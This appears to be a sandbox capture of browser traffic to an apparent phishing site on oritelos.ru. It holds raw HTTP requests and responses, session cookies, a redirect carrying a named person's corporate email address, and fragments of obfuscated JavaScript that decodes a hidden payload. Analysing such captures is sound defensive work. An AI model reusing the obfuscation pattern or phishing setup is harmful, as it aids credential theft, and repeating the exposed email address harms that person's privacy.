                                                2024-05-30 10:21:06 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 35 32 4f 48 52 6d 54 55 56 47 62 31 6c 6a 56 47 31 4e 4e 30 39 53 53 54 45 79 63 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 62 55 5a 59 62 57 52 4b 54 6a 6b 30 53 6e 70 51 57 44 68 61 55 55 6c 31 51 33 6c 4f 62 30 35 4d 4d 46 49 79 62 54 42 4b 4b 7a 42 68 52 32 70 4b 4e 69 74 45 63 45 52 6a 65 55 77 33 52 30 63 7a 59 6e 4e 68 4f 47 68 42 5a 6b 68 4c 4d 6a 56 68 65 6e 59 31 4e 56 70 49 56 47 5a 61 4f 57 56 58 51 58 70 45 52 31 46 45 4d 6e 56 50 62 56 68 4c 4c 32 49 7a 62 54 6c 61 53 57 4e 36 53 6e 45 77 61 33 64 4e 51 6a 56 55 4e 7a 68 58 64 30 6c 48 54 47 4d 7a 53 30 39 53 56 44 46 59 62 43 73 30 53 57 5a 43 56 6e 42 69 62 30 59
                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ik52OHRmTUVGb1ljVG1NN09SSTEyc1E9PSIsInZhbHVlIjoibUZYbWRKTjk0SnpQWDhaUUl1Q3lOb05MMFIybTBKKzBhR2pKNitEcERjeUw3R0czYnNhOGhBZkhLMjVhenY1NVpIVGZaOWVXQXpER1FEMnVPbVhLL2IzbTlaSWN6SnEwa3dNQjVUNzhXd0lHTGMzS09SVDFYbCs0SWZCVnBib0Y
                                                2024-05-30 10:21:06 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                Data Ascii: 14{"status":"success"}
                                                2024-05-30 10:21:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.2.449773188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:07 UTC1467OUTGET /hIzc6w/ HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                Cache-Control: max-age=0
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Referer: https://f8gxf.oritelos.ru/hIzc6w/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6Imt0TFhad2ZVSzZVcmpaVDJSMFpLaHc9PSIsInZhbHVlIjoidDJUOFRVcUdRS0FGSVR5VWJJTGxQUFlrWktpSVBqME10amZYZlVDeGgwTE1BYmRQMnpqVWVXL2RNdDN6M3hRQ0pJSVZ5SHJ2RGUwYThIMzN2WFZ0RFBkKzU1TDhvRVdaSW1Da3FQQnRBMVFSV3ZUbXQ1SUpwdE9BZ0hhSlJqWjYiLCJtYWMiOiI3MjliNzBiOGMxYWM1YTlhMjJkZjMyMWZiZjFhYzdkOTdmN2VmMDQ0ZjEzODViZDg0MTQzN2JkMmJkN2ZkZjBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik52OHRmTUVGb1ljVG1NN09SSTEyc1E9PSIsInZhbHVlIjoibUZYbWRKTjk0SnpQWDhaUUl1Q3lOb05MMFIybTBKKzBhR2pKNitEcERjeUw3R0czYnNhOGhBZkhLMjVhenY1NVpIVGZaOWVXQXpER1FEMnVPbVhLL2IzbTlaSWN6SnEwa3dNQjVUNzhXd0lHTGMzS09SVDFYbCs0SWZCVnBib0YiLCJtYWMiOiIwZWI0M2M5YjI0NjJmYTFiMmIyNDM0ZjgzMjE4YjRjMDY4ZTZjODUxMjcyZmQxNmY4Njk0MzcwM2JjMWM5YmRkIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:07 UTC1007INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:07 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: no-cache, private
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c0Ld%2FJj25dXQtAsNzqMvxitg4XXSYhcn2x%2FFfglvMQNFARIQUlxOY699IG6%2Fi6PQZgD6sq9UmktD6k17RAMHAwGlwh5p8q%2FftLBuUiv4Bk80Hsfghu8MxP4vO9uF7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6IkVkays2WFhwVlVleW43YnhncG4zUXc9PSIsInZhbHVlIjoiOEthK05qdG9TS1NuSngyWGxtRUhGbWZuSTlPOGZGVk5OWFdXS0MxenZIU0VLeVFudVJDT1crOSs1bW5iSWNvbDVLYitPbkRqY1M2Z0JwLzE1WG4yRE5wT3lxa2RuTm1QSFRoTkZkUkljakppa2laNm9ueUQyRmZnYW4zWDRtbUYiLCJtYWMiOiI4ZTRlNzcwYWNmZWZlOTRmNjU5OTAwMmZmZjVkNTEwZjQ3Y2QwZGI4ZTZiNWRmZDgxNDZhZDc2ZDYwNDc3NTU0IiwidGFnIjoiIn0%3D; expires=Thu, 30-May-2024 12:21:07 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                2024-05-30 10:21:07 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 31 33 4d 6d 73 30 59 6a 68 4a 56 44 59 32 54 7a 41 72 52 57 78 75 55 6d 4e 48 51 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 33 42 32 4d 6a 4a 70 62 56 42 6f 62 7a 4e 7a 53 33 4a 51 52 45 77 35 4d 31 6f 31 52 56 4a 75 62 6a 4a 59 4d 44 4a 7a 59 6c 4e 72 57 6b 52 4a 64 32 6f 32 52 46 6c 50 4d 54 6c 72 5a 48 64 6b 56 48 56 54 61 6d 64 47 63 6e 6c 79 55 48 64 78 52 6c 42 48 61 6c 64 7a 64 44 63 77 53 31 4a 61 56 32 35 4f 62 6d 56 59 59 6b 59 31 61 6e 6c 4c 55 54 46 61 5a 57 39 30 4e 58 59 78 5a 32 35 4c 5a 58 46 50 4c 7a 6c 46 61 6e 59 34 52 32 70 73 63 46 46 4b 4f 43 74 56 4d 54 4e 35 4c 32 39 54 51 31 64 73 51 6b 6c 49 57 6b 77
                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ik13Mms0YjhJVDY2TzArRWxuUmNHQkE9PSIsInZhbHVlIjoiY3B2MjJpbVBobzNzS3JQREw5M1o1RVJubjJYMDJzYlNrWkRJd2o2RFlPMTlrZHdkVHVTamdGcnlyUHdxRlBHaldzdDcwS1JaV25ObmVYYkY1anlLUTFaZW90NXYxZ25LZXFPLzlFanY4R2pscFFKOCtVMTN5L29TQ1dsQklIWkw
                                                2024-05-30 10:21:08 UTC1369INData Raw: 37 31 34 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 78 6c 78 63 69 59 51 78 78 59 28 51 71 71 6f 59 44 6b 59 57 52 2c 20 71 46 79 64 4b 58 76 7a 4e 43 29 20 7b 0d 0a 6c 65 74 20 6f 6a 51 6b 66 5a 45 4d 46 41 20 3d 20 27 27 3b 0d 0a 51 71 71 6f 59 44 6b 59 57 52 20 3d 20 61 74 6f 62 28 51 71 71 6f 59 44 6b 59 57 52 29 3b 0d 0a 6c 65 74 20 43 49 79 7a 42 54 79 48 56 54 20 3d 20 71 46 79 64 4b 58 76 7a 4e 43 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 51 71 71 6f 59 44 6b 59 57 52 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 6f 6a 51 6b 66 5a 45 4d 46 41 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 51 71 71 6f 59 44 6b 59 57 52 2e 63 68 61 72 43 6f
                                                Data Ascii: 714<script>function xlxciYQxxY(QqqoYDkYWR, qFydKXvzNC) {let ojQkfZEMFA = '';QqqoYDkYWR = atob(QqqoYDkYWR);let CIyzBTyHVT = qFydKXvzNC.length;for (let i = 0; i < QqqoYDkYWR.length; i++) { ojQkfZEMFA += String.fromCharCode(QqqoYDkYWR.charCo
                                                2024-05-30 10:21:08 UTC450INData Raw: 45 52 77 39 66 6a 6b 5a 45 77 34 75 5a 6d 6c 2f 45 51 77 6a 56 6b 6f 77 62 51 34 64 4e 6d 63 71 46 56 55 39 58 57 74 33 61 48 6f 58 65 77 68 57 50 41 78 72 4e 41 64 36 45 47 42 35 51 54 6f 57 64 47 49 37 66 6d 56 35 64 41 51 62 54 52 30 67 4d 7a 73 6d 44 58 30 6a 56 7a 42 39 51 30 78 33 61 6e 42 30 45 51 46 46 41 78 59 71 50 41 6b 35 4d 68 51 2b 4b 57 5a 7a 65 33 63 6b 4a 54 67 55 54 68 5a 4c 52 47 5a 33 61 6e 41 6a 45 51 6b 4a 4b 54 6c 6f 4f 79 55 7a 4e 51 77 4f 41 69 68 67 4c 69 55 76 4e 6e 52 46 52 78 6f 76 49 43 49 34 50 58 34 34 46 77 51 4d 4d 69 63 70 4f 57 51 67 4e 51 77 50 41 79 63 6a 49 32 78 48 57 6e 52 59 52 30 30 37 51 30 78 33 61 6e 42 30 45 51 46 46 41 78 59 71 50 41 6b 35 4d 68 51 2b 4b 57 5a 76 65 32 70 71 50 69 45 55 43 30 51 39 51 30 78
                                                Data Ascii: ERw9fjkZEw4uZml/EQwjVkowbQ4dNmcqFVU9XWt3aHoXewhWPAxrNAd6EGB5QToWdGI7fmV5dAQbTR0gMzsmDX0jVzB9Q0x3anB0EQFFAxYqPAk5MhQ+KWZze3ckJTgUThZLRGZ3anAjEQkJKTloOyUzNQwOAihgLiUvNnRFRxovICI4PX44FwQMMicpOWQgNQwPAycjI2xHWnRYR007Q0x3anB0EQFFAxYqPAk5MhQ+KWZve2pqPiEUC0Q9Q0x
                                                2024-05-30 10:21:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.2.449777188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:07 UTC1089OUTGET /pbGQlY127p6h0ts0giGGM6xrw HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6Imt0TFhad2ZVSzZVcmpaVDJSMFpLaHc9PSIsInZhbHVlIjoidDJUOFRVcUdRS0FGSVR5VWJJTGxQUFlrWktpSVBqME10amZYZlVDeGgwTE1BYmRQMnpqVWVXL2RNdDN6M3hRQ0pJSVZ5SHJ2RGUwYThIMzN2WFZ0RFBkKzU1TDhvRVdaSW1Da3FQQnRBMVFSV3ZUbXQ1SUpwdE9BZ0hhSlJqWjYiLCJtYWMiOiI3MjliNzBiOGMxYWM1YTlhMjJkZjMyMWZiZjFhYzdkOTdmN2VmMDQ0ZjEzODViZDg0MTQzN2JkMmJkN2ZkZjBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik52OHRmTUVGb1ljVG1NN09SSTEyc1E9PSIsInZhbHVlIjoibUZYbWRKTjk0SnpQWDhaUUl1Q3lOb05MMFIybTBKKzBhR2pKNitEcERjeUw3R0czYnNhOGhBZkhLMjVhenY1NVpIVGZaOWVXQXpER1FEMnVPbVhLL2IzbTlaSWN6SnEwa3dNQjVUNzhXd0lHTGMzS09SVDFYbCs0SWZCVnBib0YiLCJtYWMiOiIwZWI0M2M5YjI0NjJmYTFiMmIyNDM0ZjgzMjE4YjRjMDY4ZTZjODUxMjcyZmQxNmY4Njk0MzcwM2JjMWM5YmRkIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:08 UTC585INHTTP/1.1 404 Not Found
                                                Date: Thu, 30 May 2024 10:21:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OXf2%2BKrnWdkLM%2Floc9n5vcpDxhlHHEIMX6h87JMpbllv0be%2FZMwknM62RYWAiFkb0A%2F6Ermi4aNZEQg%2F3E8sezwH5ByDRsBWjBM3oH3hZC83DY%2B2D1HdV8w1FvJgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfedb78e80f95-EWR
                                                2024-05-30 10:21:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.2.449774188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:08 UTC1450OUTGET /hIzc6w/?RDian.hancock@baesystems.com HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Referer: https://f8gxf.oritelos.ru/hIzc6w/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IkVkays2WFhwVlVleW43YnhncG4zUXc9PSIsInZhbHVlIjoiOEthK05qdG9TS1NuSngyWGxtRUhGbWZuSTlPOGZGVk5OWFdXS0MxenZIU0VLeVFudVJDT1crOSs1bW5iSWNvbDVLYitPbkRqY1M2Z0JwLzE1WG4yRE5wT3lxa2RuTm1QSFRoTkZkUkljakppa2laNm9ueUQyRmZnYW4zWDRtbUYiLCJtYWMiOiI4ZTRlNzcwYWNmZWZlOTRmNjU5OTAwMmZmZjVkNTEwZjQ3Y2QwZGI4ZTZiNWRmZDgxNDZhZDc2ZDYwNDc3NTU0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik13Mms0YjhJVDY2TzArRWxuUmNHQkE9PSIsInZhbHVlIjoiY3B2MjJpbVBobzNzS3JQREw5M1o1RVJubjJYMDJzYlNrWkRJd2o2RFlPMTlrZHdkVHVTamdGcnlyUHdxRlBHaldzdDcwS1JaV25ObmVYYkY1anlLUTFaZW90NXYxZ25LZXFPLzlFanY4R2pscFFKOCtVMTN5L29TQ1dsQklIWkwiLCJtYWMiOiI5YzM2OGM1MjE1YWRjZjFhMjZiN2Q2OWExN2Y0MGFlMTc3M2EwZjdkZDYxMzMzZGQzM2E4ODM4ZjNhODFiZDdjIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:08 UTC1127INHTTP/1.1 302 Found
                                                Date: Thu, 30 May 2024 10:21:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: no-cache, private
                                                Location: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EJ6JK8MtRB%2BQYbC3acqZtr3HRzUOEDxsBobLus0Yc%2FvUkKph22jHpI5ob4dNVF38wTH0X%2BLtyqmHEpxRnimG3sMO0DYciR6A9gOzP8nnGFdiIrRyUnVqLCx4gQsTDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6IkM1YmkzSHJFY3lOdVdXeVZ4QjVWYmc9PSIsInZhbHVlIjoiU2Jhc00rVGl0OWNMYUlnbzNhUnluelBoaWtjSHB5MExCK0txZ2lZdWgxUUtXS29kWldUa1Y0THhnWFpoZDEwMEkvRU9xb25ob2JBY3ZkRkZBb0tRS2FyTDFBZFhPQW42Y3JXNVM0RlBqWjVLZmhjNlJqUHVpL1B1eGEyVXFJazAiLCJtYWMiOiIxMmI5Y2M0ZTExODY3MWJiM2U4ZGY2ZjBhNjAyMTQyMTQ3ZjhmOTA2MjkxY2UzMDY5NzQ0YjgzOTJlOWY5YzU5IiwidGFnIjoiIn0%3D; expires=Thu, 30-May-2024 12:21:08 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                2024-05-30 10:21:08 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 56 53 61 45 31 4c 61 55 51 79 5a 47 73 77 57 55 46 4b 56 6d 39 77 4c 31 4e 61 5a 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 47 39 32 52 6c 55 76 55 47 52 4e 63 6b 74 52 55 6c 52 54 62 57 5a 79 4e 6b 4e 59 59 6d 78 69 4d 47 39 78 54 47 74 61 56 44 4a 76 5a 31 49 35 65 6d 56 68 62 6b 30 7a 62 31 5a 4d 59 6a 59 78 51 32 35 69 4f 58 70 43 63 33 5a 59 56 48 4d 78 52 30 35 6f 57 48 52 53 62 58 68 44 52 54 46 30 4d 56 56 31 4f 46 64 4b 5a 6d 6c 55 4d 31 4a 47 52 7a 4e 6f 53 57 74 73 4e 30 52 76 4d 6e 56 78 61 6d 52 53 59 6d 46 75 52 31 4a 30 51 6b 52 42 61 30 6c 76 63 58 70 53 52 32 4d 72 61 56 46 43 61 57 70 35 61 32 74 79 52 57 38
                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlVSaE1LaUQyZGswWUFKVm9wL1NaZUE9PSIsInZhbHVlIjoiaG92RlUvUGRNcktRUlRTbWZyNkNYYmxiMG9xTGtaVDJvZ1I5emVhbk0zb1ZMYjYxQ25iOXpCc3ZYVHMxR05oWHRSbXhDRTF0MVV1OFdKZmlUM1JGRzNoSWtsN0RvMnVxamRSYmFuR1J0QkRBa0lvcXpSR2MraVFCaWp5a2tyRW8
                                                2024-05-30 10:21:08 UTC681INData Raw: 32 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 66 38 67 78 66 2e 6f 72 69 74 65 6c 6f 73 2e 72 75 2f 7a 79 75 71 69 68 73 62 67 68 76 61 6a 72 6c 72 72 72 50 43 4e 45 58 48 4f 57 48 50 4a 46 58 48 50 51 56 4a 45 56 45 55 58 41 3f 68 6f 74 70 75 6f 78 73 63 7a 75 70 66 71 74 73 71 6d 7a 71 67 65 57 4c 4b 56 44 4b 50 4f 41 52 41 53 51 56 56 47 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64
                                                Data Ascii: 2a2<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG'" /> <title>Red
                                                2024-05-30 10:21:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.2.449778188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:08 UTC1495OUTGET /zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Referer: https://f8gxf.oritelos.ru/hIzc6w/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IkM1YmkzSHJFY3lOdVdXeVZ4QjVWYmc9PSIsInZhbHVlIjoiU2Jhc00rVGl0OWNMYUlnbzNhUnluelBoaWtjSHB5MExCK0txZ2lZdWgxUUtXS29kWldUa1Y0THhnWFpoZDEwMEkvRU9xb25ob2JBY3ZkRkZBb0tRS2FyTDFBZFhPQW42Y3JXNVM0RlBqWjVLZmhjNlJqUHVpL1B1eGEyVXFJazAiLCJtYWMiOiIxMmI5Y2M0ZTExODY3MWJiM2U4ZGY2ZjBhNjAyMTQyMTQ3ZjhmOTA2MjkxY2UzMDY5NzQ0YjgzOTJlOWY5YzU5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlVSaE1LaUQyZGswWUFKVm9wL1NaZUE9PSIsInZhbHVlIjoiaG92RlUvUGRNcktRUlRTbWZyNkNYYmxiMG9xTGtaVDJvZ1I5emVhbk0zb1ZMYjYxQ25iOXpCc3ZYVHMxR05oWHRSbXhDRTF0MVV1OFdKZmlUM1JGRzNoSWtsN0RvMnVxamRSYmFuR1J0QkRBa0lvcXpSR2MraVFCaWp5a2tyRW8iLCJtYWMiOiJiMGI5MThiZDUwNDQzNWEzMWFhOTE3MjZkOGU2YTViODc1MDk1N2Q4NWRhYjUxNTk3NWNmZTcxYTViNGJlNTExIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:09 UTC1007INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:09 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: no-cache, private
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EvpqaoVNE9APh232xwtQXLAMKNskWhH%2BEH5lG4Ub18u5gP%2BPahMC0C%2BJGX7HcbYLjx9F5Ld2n1t8oL4zUy8diPTBm0xHw0WcDcbV%2FXy7D7TLKUdOL2m8wdrGAKAGjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; expires=Thu, 30-May-2024 12:21:09 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                2024-05-30 10:21:09 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 6c 59 59 6d 64 72 61 33 5a 34 56 6e 4a 68 64 57 68 4e 59 6b 70 47 61 46 68 42 52 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 6b 46 70 4f 58 68 45 64 32 70 6b 55 53 39 74 5a 32 55 76 65 6d 64 4c 54 55 4a 4c 51 58 70 68 4e 45 5a 73 61 6b 35 68 56 6b 73 35 53 6b 63 72 59 30 78 72 55 6c 64 45 4f 46 42 4f 52 6b 56 33 53 48 4a 44 4f 56 4e 4a 5a 33 42 53 5a 32 45 35 54 32 46 56 53 6d 63 35 59 57 31 49 56 33 42 32 55 33 4e 30 63 47 6c 6f 55 6e 6c 6f 54 58 4a 6b 52 58 4a 75 61 47 51 34 61 30 35 30 53 6b 56 48 55 48 59 72 53 47 31 5a 61 55 68 4c 56 46 42 79 59 31 5a 53 59 6d 64 68 4e 6a 64 32 62 56 4a 6d 55 7a 46 69 53 6b 52 34 57 6d 73
                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4Wms
                                                2024-05-30 10:21:09 UTC1369INData Raw: 33 35 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 36 2e 30 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 3e 3c
                                                Data Ascii: 352d<!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdn.socket.io/4.6.0/socket.io.min.js"></script> <script src="https://www.google.com/recaptcha/api.js"><
